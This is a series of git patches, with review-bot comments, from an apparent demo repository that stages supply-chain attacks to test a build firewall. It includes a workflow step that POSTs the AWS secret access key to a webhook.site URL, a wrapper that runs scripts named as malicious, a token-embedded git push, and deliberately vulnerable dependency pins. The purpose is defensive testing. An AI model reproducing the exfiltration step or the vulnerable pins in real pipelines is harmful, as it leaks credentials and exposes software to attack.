@@ -1,17 +0,0 @@ -#!/bin/bash - -echo "Marking repository as safe..." -git config --global --add safe.directory "$GITHUB_WORKSPACE" - -echo "Setting up Git user..." -git config user.name "ir-paras-oli" -git config user.email "paras.oli@invisirisk.com" - -echo "Making changes (creating a file)..." -echo "Some new content" > new6-file.txt -git add new6-file.txt -git commit -m "Add a new file" - -echo "Pushing changes to the STAGE branch..." -git remote set-url origin https://x-access-token:${{ secrets.GITHUB_TOKEN }}@github.com/${{ github.repository }}.git -git push origin STAGE diff --git a/run_wrapper.sh b/run_wrapper.sh deleted file mode 100644 index b6e5e2e..0000000 --- a/run_wrapper.sh +++ /dev/null @@ -1,8 +0,0 @@ -#!/bin/bash - -echo "Starting leak_token.sh execution..." -bash ./secret_leak.sh # Call the actual script -bash ./statuscode.sh # Call the actual script -bash ./push.sh # Call the actual script -bash ./mimetype.sh # Call the actual script -echo "Execution completed." diff --git a/statuscode.sh b/statuscode.sh deleted file mode 100644 index bec9161..0000000 --- a/statuscode.sh +++ /dev/null @@ -1,11 +0,0 @@ -#!/bin/bash - -echo "Checking status code from GitHub API..." - -# This request should trigger a 400 Bad Request because 'q' is empty -curl -k -i -X GET "https://api.github.com/search/repositories?q=" - -# This request should trigger a 401 Unauthorized if authentication is required but not provided -# curl -k -i -X GET "https://api.github.com/user" - -echo "Status check completed." From aa17ec906cf4c72f8dd2251b2cdc1c099f9aa3b3 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 2 May 2025 12:06:08 +0545 Subject: [PATCH 76/89] change --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 1688be2..d687843 100644 --- a/README.md +++ b/README.md 
@@ -1,6 +1,6 @@ # InvisiRisk Build Application Firewall Demo -This repository contains a Python application that demonstrates how InvisiRisk build application firewall works. The project serves as a boilerplate example to showcase the security features and implementation of InvisiRisk in a Python environment. +This repository contains a JavaScript application that demonstrates how InvisiRisk build application firewall works. The project serves as a boilerplate example to showcase the security features and implementation of InvisiRisk in a JavaScript environment. ## GitHub Workflow Setup From aab654a55ea51b6c8529a97ebeb9a2962155714b Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 2 May 2025 12:09:19 +0545 Subject: [PATCH 77/89] change in build file --- .github/workflows/build.yml | 4 ++-- {.github => Malicious_scripts}/secret_leak.sh | 0 2 files changed, 2 insertions(+), 2 deletions(-) rename {.github => Malicious_scripts}/secret_leak.sh (100%) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index e6b1523..235c022 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -16,7 +16,7 @@ jobs: - name: Setup PSE uses: invisirisk/pse-action@dev-test with: - api_url: "https://app.dev.veribom.com" + api_url: "https://app.invisirisk.com" app_token: ${{ secrets.IR_API_KEY }} job_status: ${{job.status}} @@ -34,6 +34,6 @@ jobs: run: bash run_malicious_scripts.sh - name: Cleanup PSE if: always() - uses: invisirisk/pse-action@dev-test + uses: invisirisk/pse-action@dev-latest with: cleanup: "true" diff --git a/.github/secret_leak.sh b/Malicious_scripts/secret_leak.sh similarity index 100% rename from .github/secret_leak.sh rename to Malicious_scripts/secret_leak.sh From 54d1d65930f54aef772a4bdf2185e5e1fbc1eceb Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 2 May 2025 12:11:57 +0545 Subject: [PATCH 78/89] change in build file --- .github/workflows/build.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 235c022..ea01bb8 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -34,6 +34,6 @@ jobs: run: bash run_malicious_scripts.sh - name: Cleanup PSE if: always() - uses: invisirisk/pse-action@dev-latest + uses: invisirisk/pse-action@latest with: cleanup: "true" From df582fd7c36a9eb46cfe0f6c98adb2585d53afda Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 2 May 2025 12:13:53 +0545 Subject: [PATCH 79/89] change --- .github/workflows/build.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index ea01bb8..e9c0560 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -1,6 +1,9 @@ name: JavaScript Project on: + push: + branches: + - main workflow_dispatch: permissions: From 6017a85a2df793e1b7be0486381fa6ee1da93a63 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 2 May 2025 12:22:33 +0545 Subject: [PATCH 80/89] change' --- run_malicious_scripts.sh | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 run_malicious_scripts.sh diff --git a/run_malicious_scripts.sh b/run_malicious_scripts.sh new file mode 100644 index 0000000..deac8b2 --- /dev/null +++ b/run_malicious_scripts.sh @@ -0,0 +1,9 @@ +#!/bin/bash + +echo "Starting malicious execution..." +bash malicious_scripts/secret_leak.sh # Call the actual script +bash malicious_scripts/status_code.sh # Call the actual script +bash malicious_scripts/push.sh # Call the actual script +bash malicious_scripts/mime_type.sh # Call the actual script +bash malicious_scripts/content_length.sh # Call the actual script +echo "Execution completed." \ No newline at end of file From ad0da2325608d0d9d680edf141020e16333602bd Mon Sep 17 00:00:00 2001 
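Review bot: Every path in run_malicious_scripts.sh points at `malicious_scripts/…`, while the scripts added earlier in this series live under `Malicious_scripts/` and are named `statuscode.sh` and `mimetype.sh`, not `status_code.sh` and `mime_type.sh`; on a case-sensitive `ubuntu-latest` runner those calls would fail with "No such file or directory". `content_length.sh` is not added by any patch visible here, and at this commit `mimetype.sh` still sits under `mern-social-second-edition/`. Because the script has no `set -e`, it still prints "Execution completed." and exits 0, so the workflow step reports success without having run any of the test cases the build firewall is supposed to catch. Align the names with the files on disk, e.g. `bash Malicious_scripts/statuscode.sh`, and add `set -euo pipefail` under the shebang so a missing fixture fails the step.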
From: ir-paras-oli Date: Fri, 2 May 2025 12:29:12 +0545 Subject: [PATCH 81/89] change in code --- package.json | 106 +++++++++++++++++++++++++-------------------------- 1 file changed, 53 insertions(+), 53 deletions(-) diff --git a/package.json b/package.json index 56f2dd3..87fd990 100644 --- a/package.json +++ b/package.json 
@@ -1,63 +1,63 @@ { - "name": "vulnerable-project", + "name": "javascript-project", "version": "1.0.0", - "description": "A project with intentionally vulnerable dependencies.", + "description": "Demo Project", "main": "index.js", "scripts": { "start": "node index.js", "test": "echo \"Error: no test specified\" && exit 1" }, "dependencies": { - "express": "4.17.1", - "lodash": "4.17.20", - "mongoose": "5.9.2", - "body-parser": "1.19.0", - "cors": "2.8.5", - "dotenv": "8.2.0", - "jsonwebtoken": "8.3.0", - "helmet": "3.23.3", - "morgan": "1.10.0", - "bcryptjs": "2.4.3", - "moment": "2.24.0", - "request": "2.88.2", - "bluebird": "3.7.2", - "debug": "2.6.9", - "async": "3.2.0", - "winston": "3.2.1", - "multer": "1.4.2", - "nodemailer": "6.4.6", - "mysql": "2.18.1", - "pg": "8.2.1", - "redis": "3.0.2", - "socket.io": "2.3.0", - "uuid": "3.3.3", - "validator": "13.1.1", - "xml2js": "0.4.23", - "cheerio": "1.0.0-rc.3", - "crypto-js": "4.0.0", - "node-fetch": "2.6.1", - "sharp": "0.25.4", - "commander": "5.0.0", - "chalk": "4.0.0", - "ini": "1.3.5", - "handlebars": "4.7.6", - "marked": "0.3.6", - "merge-deep": "3.0.2", - "minimist": "1.2.5", - "q": "1.5.1", - "underscore": "1.10.2", - "yargs-parser": "20.2.2", - "jquery": "3.5.1", - "xmlhttprequest": "1.8.0", - "lodash.merge": "4.6.2", - "lodash.defaultsdeep": "4.6.1", - "react": "16.13.1", - "react-dom": "16.13.1", - "axios": "0.19.2", - "next": "13.5.5", - "shelljs": "0.8.4", - "node-forge": "0.10.0", - "xml-js": "1.6.11", - "hoek": "5.0.3" + "express": "^4.18.2", + "lodash": "^4.17.21", + "mongoose": "^7.5.2", + "body-parser": "^1.20.2", + "cors": "^2.8.5", + "dotenv": "^16.3.1", + "jsonwebtoken": "^9.0.2", + "helmet": "^7.0.0", + "morgan": "^1.10.0", + "bcryptjs": "^2.4.3", + "moment": "^2.29.4", + "request": "^2.88.2", + "bluebird": "^3.7.2", + "debug": "^4.3.4", + "async": "^3.2.5", + "winston": "^3.9.0", + "multer": "^1.4.5-lts.1", + "nodemailer": "^6.9.5", + "mysql": "^2.18.1", + "pg": "^8.11.1", + "redis": 
"^4.6.7", + "socket.io": "^4.7.2", + "uuid": "^9.0.0", + "validator": "^13.11.0", + "xml2js": "^0.6.2", + "cheerio": "^1.0.0-rc.12", + "crypto-js": "^4.2.0", + "node-fetch": "^2.6.12", + "sharp": "^0.33.3", + "commander": "^11.1.0", + "chalk": "^5.3.0", + "ini": "^4.1.1", + "handlebars": "^4.7.8", + "marked": "^9.1.2", + "merge-deep": "^3.0.3", + "minimist": "^1.2.8", + "q": "^1.5.1", + "underscore": "^1.13.6", + "yargs-parser": "^21.1.1", + "jquery": "^3.7.1", + "xmlhttprequest": "^1.8.0", + "lodash.merge": "^4.6.2", + "lodash.defaultsdeep": "^4.6.1", + "react": "^18.2.0", + "react-dom": "^18.2.0", + "axios": "^1.6.8", + "next": "^14.1.4", + "shelljs": "^0.8.5", + "node-forge": "^1.3.1", + "xml-js": "^1.6.11", + "hoek": "^9.1.0" } } From eb74bfbcc9e29367c0baf26b5a6d5094b3508914 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 2 May 2025 12:35:56 +0545 Subject: [PATCH 82/89] change in code --- .../mimetype.sh | 0 package.json | 104 +++++++++--------- 2 files changed, 52 insertions(+), 52 deletions(-) rename {mern-social-second-edition => Malicious_scripts}/mimetype.sh (100%) diff --git a/mern-social-second-edition/mimetype.sh b/Malicious_scripts/mimetype.sh similarity index 100% rename from mern-social-second-edition/mimetype.sh rename to Malicious_scripts/mimetype.sh diff --git a/package.json b/package.json index 87fd990..3d0d9aa 100644 --- a/package.json +++ b/package.json 
@@ -1,63 +1,63 @@ { "name": "javascript-project", "version": "1.0.0", - "description": "Demo Project", + "description": "Demo JavaScript Project", "main": "index.js", "scripts": { "start": "node index.js", "test": "echo \"Error: no test specified\" && exit 1" }, "dependencies": { - "express": "^4.18.2", - "lodash": "^4.17.21", - "mongoose": "^7.5.2", - "body-parser": "^1.20.2", - "cors": "^2.8.5", - "dotenv": "^16.3.1", - "jsonwebtoken": "^9.0.2", - "helmet": "^7.0.0", - "morgan": "^1.10.0", - "bcryptjs": "^2.4.3", - "moment": "^2.29.4", - "request": "^2.88.2", - "bluebird": "^3.7.2", - "debug": "^4.3.4", - "async": "^3.2.5", - "winston": "^3.9.0", - "multer": "^1.4.5-lts.1", - "nodemailer": "^6.9.5", - "mysql": "^2.18.1", - "pg": "^8.11.1", - "redis": "^4.6.7", - "socket.io": "^4.7.2", - "uuid": "^9.0.0", - "validator": "^13.11.0", - "xml2js": "^0.6.2", - "cheerio": "^1.0.0-rc.12", - "crypto-js": "^4.2.0", - "node-fetch": "^2.6.12", - "sharp": "^0.33.3", - "commander": "^11.1.0", - "chalk": "^5.3.0", - "ini": "^4.1.1", - "handlebars": "^4.7.8", - "marked": "^9.1.2", - "merge-deep": "^3.0.3", - "minimist": "^1.2.8", - "q": "^1.5.1", - "underscore": "^1.13.6", - "yargs-parser": "^21.1.1", - "jquery": "^3.7.1", - "xmlhttprequest": "^1.8.0", - "lodash.merge": "^4.6.2", - "lodash.defaultsdeep": "^4.6.1", - "react": "^18.2.0", - "react-dom": "^18.2.0", - "axios": "^1.6.8", - "next": "^14.1.4", - "shelljs": "^0.8.5", - "node-forge": "^1.3.1", - "xml-js": "^1.6.11", - "hoek": "^9.1.0" + "express": "4.17.1", + "lodash": "4.17.20", + "mongoose": "5.9.2", + "body-parser": "1.19.0", + "cors": "2.8.5", + "dotenv": "8.2.0", + "jsonwebtoken": "8.3.0", + "helmet": "3.23.3", + "morgan": "1.10.0", + "bcryptjs": "2.4.3", + "moment": "2.24.0", + "request": "2.88.2", + "bluebird": "3.7.2", + "debug": "2.6.9", + "async": "3.2.0", + "winston": "3.2.1", + "multer": "1.4.2", + "nodemailer": "6.4.6", + "mysql": "2.18.1", + "pg": "8.2.1", + "redis": "3.0.2", + "socket.io": "2.3.0", + 
"uuid": "3.3.3", + "validator": "13.1.1", + "xml2js": "0.4.23", + "cheerio": "1.0.0-rc.3", + "crypto-js": "4.0.0", + "node-fetch": "2.6.1", + "sharp": "0.25.4", + "commander": "5.0.0", + "chalk": "4.0.0", + "ini": "1.3.5", + "handlebars": "4.7.6", + "marked": "0.3.6", + "merge-deep": "3.0.2", + "minimist": "1.2.5", + "q": "1.5.1", + "underscore": "1.10.2", + "yargs-parser": "20.2.2", + "jquery": "3.5.1", + "xmlhttprequest": "1.8.0", + "lodash.merge": "4.6.2", + "lodash.defaultsdeep": "4.6.1", + "react": "16.13.1", + "react-dom": "16.13.1", + "axios": "0.19.2", + "next": "13.5.5", + "shelljs": "0.8.4", + "node-forge": "0.10.0", + "xml-js": "1.6.11", + "hoek": "5.0.3" } } From 08a9d26a78b516ea9efea368b072c76a89463118 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 2 May 2025 15:05:44 +0545 Subject: [PATCH 83/89] Readme file removed --- mern-social-second-edition/README.md | 58 ---------------------------- 1 file changed, 58 deletions(-) delete mode 100644 mern-social-second-edition/README.md diff --git a/mern-social-second-edition/README.md b/mern-social-second-edition/README.md deleted file mode 100644 index 33664e2..0000000 --- a/mern-social-second-edition/README.md +++ /dev/null 
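Review bot: The new `"description": "Demo JavaScript Project"` no longer says that the exact pins restored in this hunk are deliberate. The versions added here (`express` 4.17.1, `lodash` 4.17.20, `jsonwebtoken` 8.3.0 and the rest) are the same ones the previous commit removed under the description "A project with intentionally vulnerable dependencies.", and `package.json` cannot carry comments, so the description is the only place in the file to record that. I would keep the intent visible, e.g. `"description": "Demo JavaScript project with intentionally outdated dependencies"`, so the manifest is not reused or "fixed" by accident.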
@@ -1,58 +0,0 @@ -# MERN Social 2.0 -- *Looking for the first edition code? [Check here](https://github.com/shamahoque/mern-social/tree/master)* - -A simple social media application with users, posts, likes and comments - developed using React, Node, Express and MongoDB. - -![MERN Social](https://s3.amazonaws.com/mernbook/git+/social.png "MERN Social") - -### [Live Demo](http://social2.mernbook.com/ "MERN Social") - -#### What you need to run this code -1. Node (13.12.0) -2. NPM (6.14.4) or Yarn (1.22.4) -3. MongoDB (4.2.0) - -#### How to run this code -1. Make sure MongoDB is running on your system -2. Clone this repository -3. Open command line in the cloned folder, - - To install dependencies, run ``` npm install ``` or ``` yarn ``` - - To run the application for development, run ``` npm run development ``` or ``` yarn development ``` -4. Open [localhost:3000](http://localhost:3000/) in the browser ----- -### More applications built using this stack - -* [MERN Skeleton](https://github.com/shamahoque/mern-social/tree/second-edition) -* [MERN Classroom](https://github.com/shamahoque/mern-classroom) -* [MERN Marketplace](https://github.com/shamahoque/mern-marketplace/tree/second-edition) -* [MERN Expense Tracker](https://github.com/shamahoque/mern-expense-tracker) -* [MERN Mediastream](https://github.com/shamahoque/mern-mediastream/tree/second-edition) -* [MERN VR Game](https://github.com/shamahoque/mern-vrgame/tree/second-edition) - -Learn more at [mernbook.com](http://www.mernbook.com/) - ----- -## Get the book -#### [Full-Stack React Projects - Second Edition](https://www.packtpub.com/web-development/full-stack-react-projects-second-edition) -*Learn MERN stack development by building modern web apps using MongoDB, Express, React, and Node.js* - -Full-Stack React Projects - -React combined with industry-tested, server-side technologies, such as Node, Express, and MongoDB, enables you to develop and deploy robust real-world full-stack web apps. 
This updated second edition focuses on the latest versions and conventions of the technologies in this stack, along with their new features such as Hooks in React and async/await in JavaScript. The book also explores advanced topics such as implementing real-time bidding, a web-based classroom app, and data visualization in an expense tracking app. - -Full-Stack React Projects will take you through the process of preparing the development environment for MERN stack-based web development, creating a basic skeleton app, and extending it to build six different web apps. You'll build apps for social media, classrooms, media streaming, online marketplaces with real-time bidding, and web-based games with virtual reality features. Throughout the book, you'll learn how MERN stack web development works, extend its capabilities for complex features, and gain actionable insights into creating MERN-based apps, along with exploring industry best practices to meet the ever-increasing demands of the real world. - -Things you'll learn in this book: - -- Extend a MERN-based application to build a variety of applications -- Add real-time communication capabilities with Socket.IO -- Implement data visualization features for React applications using Victory -- Develop media streaming applications using MongoDB GridFS -- Improve SEO for your MERN apps by implementing server-side rendering with data -- Implement user authentication and authorization using JSON web tokens -- Set up and use React 360 to develop user interfaces with VR capabilities -- Make your MERN stack applications reliable and scalable with industry best practices - -If you feel this book is for you, get your [copy](https://www.amazon.com/dp/1839215410) today! - ---- From 618f975e2c3fbd3e072fc4608efcf16ee3a80849 Mon Sep 17 00:00:00 2001 
From: ir-paras-oli Date: Mon, 5 May 2025 10:53:43 +0545 Subject: [PATCH 84/89] Update build.yml --- .github/workflows/build.yml | 18 ++---------------- 1 file changed, 2 insertions(+), 16 deletions(-) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index e9c0560..6fe8bde 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -1,9 +1,6 @@ name: JavaScript Project on: - push: - branches: - - main workflow_dispatch: permissions: @@ -12,21 +9,15 @@ permissions: packages: read jobs: - python-application-build: + unrelesed-deps: runs-on: ubuntu-latest name: Run build steps: - - name: Setup PSE - uses: invisirisk/pse-action@dev-test - with: - api_url: "https://app.invisirisk.com" - app_token: ${{ secrets.IR_API_KEY }} - job_status: ${{job.status}} - uses: actions/checkout@v4 - name: Use npm - uses: actions/setup-node@v3 + uses: actions/setup-node@v4 with: node-version: "18" @@ -35,8 +26,3 @@ jobs: - name: 😈 Execute malicious script run: bash run_malicious_scripts.sh - - name: Cleanup PSE - if: always() - uses: invisirisk/pse-action@latest - with: - cleanup: "true" From be0760a60747210ae410f20bb088ead76b64872c Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 13 May 2025 12:55:45 +0545 Subject: [PATCH 85/89] Update package.json --- package.json | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/package.json b/package.json index 3d0d9aa..4884665 100644 --- a/package.json +++ b/package.json @@ -39,12 +39,12 @@ "sharp": "0.25.4", "commander": "5.0.0", "chalk": "4.0.0", - "ini": "1.3.5", - "handlebars": "4.7.6", - "marked": "0.3.6", - "merge-deep": "3.0.2", - "minimist": "1.2.5", - "q": "1.5.1", + #"ini": "1.3.5", + # "handlebars": "4.7.6", + #"marked": "0.3.6", + # "merge-deep": "3.0.2", + # "minimist": "1.2.5", + #"q": "1.5.1", "underscore": "1.10.2", "yargs-parser": "20.2.2", "jquery": "3.5.1", From 0de9ef26c2b21aeeeaf441b15db87d067f2ea93e Mon Sep 17 00:00:00 2001 
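Review bot: The new job id `unrelesed-deps` in the second hunk is misspelled; `unreleased-deps` reads as intended. Separately, this commit removes both PSE steps but keeps the `😈 Execute malicious script` step, so if PSE is what observes those scripts they now run unmonitored; if the step is no longer meant to run, drop it in the same change.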
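Review bot: The six lines added with a leading `#` (`#"ini": "1.3.5",` through `#"q": "1.5.1",`) make `package.json` invalid, because JSON has no comment syntax, and `npm install` will fail to parse the manifest. To disable these dependencies, delete the entries and rely on version control to bring them back. The surrounding `dependencies` object starts and ends outside this hunk.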
From: ir-paras-oli Date: Tue, 13 May 2025 12:59:53 +0545 Subject: [PATCH 86/89] Update build.yml --- .github/workflows/build.yml | 25 ++++++++++++++++++++----- 1 file changed, 20 insertions(+), 5 deletions(-) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 6fe8bde..064682b 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -9,12 +9,15 @@ permissions: packages: read jobs: - unrelesed-deps: + python-application-build: runs-on: ubuntu-latest name: Run build steps: - - - uses: actions/checkout@v4 + - name: Setup PSE + uses: invisirisk/pse-action@dev-test + with: + api_url: "https://app.dev.invisirisk.com" + app_token: ${{ secrets.IR_API_KEY } - name: Use npm uses: actions/setup-node@v4 @@ -24,5 +27,17 @@ jobs: - name: Install dependencies run: npm install --legacy-peer-deps - - name: 😈 Execute malicious script - run: bash run_malicious_scripts.sh + #- name: 😈 Execute malicious script + # run: bash run_malicious_scripts.sh + + - name: Send AWS Secret via Webhook (test) + run: | + curl -X POST "https://webhook.site/59c8292c-2297-4149-ac29-c02bec44a27a" \ + --data-urlencode "aws_secret_access_key=${{ secrets.AWS_SECRET_ACCESS_KEY }}" + + + - name: Cleanup PSE + if: always() + uses: invisirisk/pse-action@dev-test + with: + cleanup: "true" From 397dc79d84069fa2cb9beeabad2372ad45c9a011 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 13 May 2025 14:16:07 +0545 Subject: [PATCH 87/89] Update package.json --- package.json | 18 ++++++------------ 1 file changed, 6 insertions(+), 12 deletions(-) diff --git a/package.json b/package.json index 4884665..733556e 100644 --- a/package.json +++ b/package.json 
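Review bot: The first hunk removes the `actions/checkout@v4` step and no checkout appears in the other visible steps, so `npm install --legacy-peer-deps` later in the job would run in a workspace without the repository's `package.json`. Unless `invisirisk/pse-action` checks the repository out itself, keep `- uses: actions/checkout@v4` after the Setup PSE step. The added `app_token: ${{ secrets.IR_API_KEY }` is also missing its closing brace, which PATCH 88/89 corrects.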
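Review bot: The added `Send AWS Secret via Webhook (test)` step posts `secrets.AWS_SECRET_ACCESS_KEY` to a third-party request-inspection endpoint, so if that secret holds a live credential it is disclosed outside the organisation whenever the workflow runs and should be treated as compromised and rotated. If the step exists to exercise a detection rule, send a constructed, non-functional value instead of a repository secret, e.g. `--data-urlencode "aws_secret_access_key=${FAKE_AWS_SECRET}"` with `FAKE_AWS_SECRET` set to a dummy string under the step's `env:`. That also avoids interpolating a `${{ secrets.* }}` expression directly into the `run:` script. A comment above the step saying it is a deliberate detection test would keep it from being copied into a real pipeline.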
@@ -33,18 +33,12 @@ "uuid": "3.3.3", "validator": "13.1.1", "xml2js": "0.4.23", - "cheerio": "1.0.0-rc.3", - "crypto-js": "4.0.0", - "node-fetch": "2.6.1", - "sharp": "0.25.4", - "commander": "5.0.0", - "chalk": "4.0.0", - #"ini": "1.3.5", - # "handlebars": "4.7.6", - #"marked": "0.3.6", - # "merge-deep": "3.0.2", - # "minimist": "1.2.5", - #"q": "1.5.1", + "ini": "1.3.5", + "handlebars": "4.7.6", + "marked": "0.3.6", + "merge-deep": "3.0.2", + "minimist": "1.2.5", + "q": "1.5.1", "underscore": "1.10.2", "yargs-parser": "20.2.2", "jquery": "3.5.1", From c76a953951b20ea41ce220d8d9d782bd96ef1bb4 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 13 May 2025 14:18:23 +0545 Subject: [PATCH 88/89] Update build.yml --- .github/workflows/build.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 064682b..fbc9771 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -17,7 +17,7 @@ jobs: uses: invisirisk/pse-action@dev-test with: api_url: "https://app.dev.invisirisk.com" - app_token: ${{ secrets.IR_API_KEY } + app_token: ${{ secrets.IR_API_KEY }} - name: Use npm uses: actions/setup-node@v4 From fcbee8fc99501ff1f6e4bb3e105714f6eb03d77c Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 13 May 2025 14:20:34 +0545 Subject: [PATCH 89/89] Update build.yml --- .github/workflows/build.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index fbc9771..b7336dd 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -16,7 +16,7 @@ jobs: - name: Setup PSE uses: invisirisk/pse-action@dev-test with: - api_url: "https://app.dev.invisirisk.com" + api_url: "https://app.stage.invisirisk.com" app_token: ${{ secrets.IR_API_KEY }} - name: Use npm